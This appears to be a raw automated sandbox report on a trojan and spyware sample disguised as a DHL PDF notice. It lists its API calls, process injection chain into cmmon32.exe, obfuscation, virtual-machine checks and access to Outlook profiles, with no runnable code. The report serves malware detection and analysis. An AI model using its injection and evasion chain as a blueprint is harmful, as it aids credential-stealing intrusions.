Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B28EC 5_2_045B28EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044FB090 5_2_044FB090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045120A0 5_2_045120A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B20A8 5_2_045B20A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_044EF900 5_2_044EF900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04504120 5_2_04504120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045099BF 5_2_045099BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0459FA2B 5_2_0459FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A4AEF 5_2_045A4AEF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B22AE 5_2_045B22AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450AB40 5_2_0450AB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0450A309 5_2_0450A309
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045B2B28 5_2_045B2B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045A03DA 5_2_045A03DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045ADBD2 5_2_045ADBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451ABD8 5_2_0451ABD8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045923E3 5_2_045923E3
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0451EBB0 5_2_0451EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C8D70 5_2_027C8D70
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C3A50 5_2_027C3A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027CA200 5_2_027CA200
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E12F5 5_2_027E12F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C1AD0 5_2_027C1AD0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E0AD1 5_2_027E0AD1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C1AC6 5_2_027C1AC6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E03A8 5_2_027E03A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C3830 5_2_027C3830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DE830 5_2_027DE830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C3827 5_2_027C3827
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E10B8 5_2_027E10B8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027CA1FB 5_2_027CA1FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E018E 5_2_027E018E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DFC99 5_2_027DFC99
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: String function: 009FB150 appears 136 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 044EB150 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E533 NtCreateFile, 3_2_0041E533
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E5E3 NtReadFile, 3_2_0041E5E3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E663 NtClose, 3_2_0041E663
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E713 NtAllocateVirtualMemory, 3_2_0041E713
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E52E NtCreateFile, 3_2_0041E52E
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E5DD NtReadFile, 3_2_0041E5DD
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A398F0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A39860
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39840 NtDelayExecution,LdrInitializeThunk, 3_2_00A39840
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A399A0 NtCreateSection,LdrInitializeThunk, 3_2_00A399A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A39910
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A20 NtResumeThread,LdrInitializeThunk, 3_2_00A39A20
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A39A00
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk, 3_2_00A39A50
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A395D0 NtClose,LdrInitializeThunk, 3_2_00A395D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39540 NtReadFile,LdrInitializeThunk, 3_2_00A39540
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A396E0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A39660
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A397A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A39780
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A39FE0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A39710
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A398A0 NtWriteVirtualMemory, 3_2_00A398A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39820 NtEnumerateKey, 3_2_00A39820
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3B040 NtSuspendThread, 3_2_00A3B040
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A399D0 NtCreateProcessEx, 3_2_00A399D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39950 NtQueueApcThread, 3_2_00A39950
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A80 NtOpenDirectoryObject, 3_2_00A39A80
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A10 NtQuerySection, 3_2_00A39A10
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A3B0 NtGetContextThread, 3_2_00A3A3B0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39B00 NtSetValueKey, 3_2_00A39B00
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A395F0 NtQueryInformationFile, 3_2_00A395F0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39520 NtWaitForSingleObject, 3_2_00A39520
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3AD30 NtSetContextThread, 3_2_00A3AD30
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39560 NtWriteFile, 3_2_00A39560
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A396D0 NtCreateKey, 3_2_00A396D0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39610 NtEnumerateValueKey, 3_2_00A39610
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39670 NtQueryInformationProcess, 3_2_00A39670
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39650 NtQueryValueKey, 3_2_00A39650
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39730 NtQueryVirtualMemory, 3_2_00A39730
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A710 NtOpenProcessToken, 3_2_00A3A710
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39760 NtOpenProcess, 3_2_00A39760
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39770 NtSetInformationFile, 3_2_00A39770
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A770 NtOpenThread, 3_2_00A3A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529540 NtReadFile,LdrInitializeThunk, 5_2_04529540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529560 NtWriteFile,LdrInitializeThunk, 5_2_04529560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045295D0 NtClose,LdrInitializeThunk, 5_2_045295D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529650 NtQueryValueKey,LdrInitializeThunk, 5_2_04529650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_04529660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529610 NtEnumerateValueKey,LdrInitializeThunk, 5_2_04529610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045296D0 NtCreateKey,LdrInitializeThunk, 5_2_045296D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_045296E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529710 NtQueryInformationToken,LdrInitializeThunk, 5_2_04529710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529FE0 NtCreateMutant,LdrInitializeThunk, 5_2_04529FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529780 NtMapViewOfSection,LdrInitializeThunk, 5_2_04529780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529840 NtDelayExecution,LdrInitializeThunk, 5_2_04529840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_04529860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_04529910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045299A0 NtCreateSection,LdrInitializeThunk, 5_2_045299A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A50 NtCreateFile,LdrInitializeThunk, 5_2_04529A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452AD30 NtSetContextThread, 5_2_0452AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529520 NtWaitForSingleObject, 5_2_04529520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045295F0 NtQueryInformationFile, 5_2_045295F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529670 NtQueryInformationProcess, 5_2_04529670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452A770 NtOpenThread, 5_2_0452A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529770 NtSetInformationFile, 5_2_04529770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529760 NtOpenProcess, 5_2_04529760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452A710 NtOpenProcessToken, 5_2_0452A710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529730 NtQueryVirtualMemory, 5_2_04529730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045297A0 NtUnmapViewOfSection, 5_2_045297A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452B040 NtSuspendThread, 5_2_0452B040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529820 NtEnumerateKey, 5_2_04529820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045298F0 NtReadVirtualMemory, 5_2_045298F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045298A0 NtWriteVirtualMemory, 5_2_045298A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529950 NtQueueApcThread, 5_2_04529950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045299D0 NtCreateProcessEx, 5_2_045299D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A10 NtQuerySection, 5_2_04529A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A00 NtProtectVirtualMemory, 5_2_04529A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A20 NtResumeThread, 5_2_04529A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A80 NtOpenDirectoryObject, 5_2_04529A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529B00 NtSetValueKey, 5_2_04529B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452A3B0 NtGetContextThread, 5_2_0452A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC870 NtClose, 5_2_027DC870
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC840 NtDeleteFile, 5_2_027DC840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC920 NtAllocateVirtualMemory, 5_2_027DC920
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC740 NtCreateFile, 5_2_027DC740
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC7F0 NtReadFile, 5_2_027DC7F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC73B NtCreateFile, 5_2_027DC73B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DC7EA NtReadFile, 5_2_027DC7EA
Source: DHL_Notice_pdf.exe ReversingLabs: Detection: 46%
Source: DHL_Notice_pdf.exe Virustotal: Detection: 42%
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe File read: C:\Users\user\Desktop\DHL_Notice_pdf.exe
Source: DHL_Notice_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\DHL_Notice_pdf.exe C:\Users\user\Desktop\DHL_Notice_pdf.exe
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsd7F3B.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/5@14/7
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: DHL_Notice_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Unpacked PE file: 3.2.zkvixbqxp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041B1FB push esi; iretd 3_2_0041B1FC
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0040DAA5 push edi; retf 3_2_0040DAAE
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041B369 push es; retf 3_2_0041B3A3
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret 3_2_00422C7C
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041C4AA push ecx; retf 3_2_0041C4AF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041BDCE push esp; ret 3_2_0041BDCF
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00401DF0 push eax; ret 3_2_00401DF2
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00406F32 push C87026BFh; retf 3_2_00406F37
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A4D0D1 push ecx; ret 3_2_00A4D0E4
Source: C:\Windows\explorer.exe Code function: 4_2_0B736F57 push ebx; retn 4855h 4_2_0B736F60
Source: C:\Windows\explorer.exe Code function: 4_2_0B73213D push ds; iretd 4_2_0B732141
Source: C:\Windows\explorer.exe Code function: 4_2_0B736EC9 push cs; retf 4_2_0B736ECA
Source: C:\Windows\explorer.exe Code function: 4_2_1194113D push ds; iretd 4_2_11941141
Source: C:\Windows\explorer.exe Code function: 4_2_11945EC9 push cs; retf 4_2_11945ECA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0453D0D1 push ecx; ret 5_2_0453D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027C513F push C87026BFh; retf 5_2_027C5144
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027E0E65 push dword ptr [057DC0C6h]; ret 5_2_027E0E89
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027DA6B7 push ecx; retf 5_2_027DA6BC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D9FDB push esp; ret 5_2_027D9FDC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D9408 push esi; iretd 5_2_027D9409
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027CBCB2 push edi; retf 5_2_027CBCBB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D9576 push es; retf 5_2_027D95B0
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe File created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Windows\explorer.exe TID: 5172 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5128 Thread sleep time: -54000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A26A60 rdtscp 3_2_00A26A60
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 879
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 871
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe API coverage: 6.5 %
Source: C:\Windows\SysWOW64\cmmon32.exe API coverage: 8.4 %
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_004207DA GetSystemInfo, 1_2_004207DA
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose, 5_2_027D31A0
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000003.473645916.000000000F4FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.514671889.000000000F4FD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW5
Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.253345613.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000004.00000000.250169139.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000004.00000002.514284558.000000000F270000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWua%SystemRoot%\system32\mswsock.dllEdgeSquare44x44.pngY
Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_00420109 mov eax, dword ptr fs:[00000030h] 1_2_00420109
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_0042005F mov eax, dword ptr fs:[00000030h] 1_2_0042005F
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 1_2_0042017B mov eax, dword ptr fs:[00000030h] 1_2_0042017B
